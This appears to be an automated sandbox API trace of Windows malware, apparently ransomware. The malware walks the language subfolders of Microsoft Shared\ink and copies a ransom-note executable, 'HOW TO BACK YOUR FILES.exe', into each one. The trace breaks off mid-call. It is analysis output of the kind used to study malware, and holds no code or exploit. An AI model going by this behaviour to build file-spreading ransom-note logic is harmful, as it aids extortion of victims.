lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.785] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.785] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH" [0076.785] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2408 | out: hHeap=0x2b0000) returned 1 [0076.786] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2720 | out: hHeap=0x2b0000) returned 1 [0076.786] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned 56 [0076.786] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH" [0076.786] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.786] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.789] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.789] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\th-TH\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f45e300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f45e300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.790] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.790] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.790] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE" [0076.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2388 | out: hHeap=0x2b0000) returned 1 [0076.790] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2700 | out: hHeap=0x2b0000) returned 1 [0076.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned 56 [0076.790] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE" [0076.790] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.790] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sv-se\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.794] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.794] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sv-SE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f45e300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f45e300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.794] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.794] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.794] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS" [0076.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0076.795] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26e0 | out: hHeap=0x2b0000) returned 1 [0076.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned 61 [0076.795] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS" [0076.795] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.795] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.802] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.802] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f484460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f484460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.802] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.802] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.802] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI" [0076.802] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2308 | out: hHeap=0x2b0000) returned 1 [0076.803] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26c0 | out: hHeap=0x2b0000) returned 1 [0076.803] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned 56 [0076.803] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI" [0076.803] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.803] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.807] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.807] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f484460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f484460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.807] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.807] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.807] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK" [0076.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2288 | out: hHeap=0x2b0000) returned 1 [0076.807] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d26a0 | out: hHeap=0x2b0000) returned 1 [0076.807] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned 56 [0076.807] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK" [0076.807] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.807] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.837] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.837] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f484460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f484460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.837] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.837] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.837] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU" [0076.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2208 | out: hHeap=0x2b0000) returned 1 [0076.837] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2680 | out: hHeap=0x2b0000) returned 1 [0076.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned 56 [0076.837] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU" [0076.837] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.837] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.842] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.842] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ru-RU\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4d0720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4d0720, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.842] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.842] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.842] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO" [0076.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2188 | out: hHeap=0x2b0000) returned 1 [0076.842] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2660 | out: hHeap=0x2b0000) returned 1 [0076.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned 56 [0076.843] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO" [0076.843] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.843] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.848] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.848] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ro-RO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4f6880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4f6880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.848] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.848] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.849] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT" [0076.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2108 | out: hHeap=0x2b0000) returned 1 [0076.849] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2640 | out: hHeap=0x2b0000) returned 1 [0076.849] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned 56 [0076.849] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT" [0076.849] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.849] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.853] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-PT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4f6880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4f6880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.853] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.853] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.853] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR" [0076.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2088 | out: hHeap=0x2b0000) returned 1 [0076.853] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2500 | out: hHeap=0x2b0000) returned 1 [0076.853] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned 56 [0076.853] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR" [0076.853] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.854] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.857] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.857] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pt-BR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f4f6880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f4f6880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.858] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.858] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.858] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL" [0076.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c2008 | out: hHeap=0x2b0000) returned 1 [0076.858] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24e0 | out: hHeap=0x2b0000) returned 1 [0076.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned 56 [0076.858] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL" [0076.858] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.858] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pl-pl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.862] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.862] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f51c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f51c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.863] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.863] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.863] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL" [0076.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1f88 | out: hHeap=0x2b0000) returned 1 [0076.863] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0076.863] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned 56 [0076.863] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL" [0076.863] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.863] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.868] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.868] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f51c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f51c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.869] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.869] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.869] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO" [0076.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1f08 | out: hHeap=0x2b0000) returned 1 [0076.869] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0076.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned 56 [0076.869] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO" [0076.869] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.869] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: 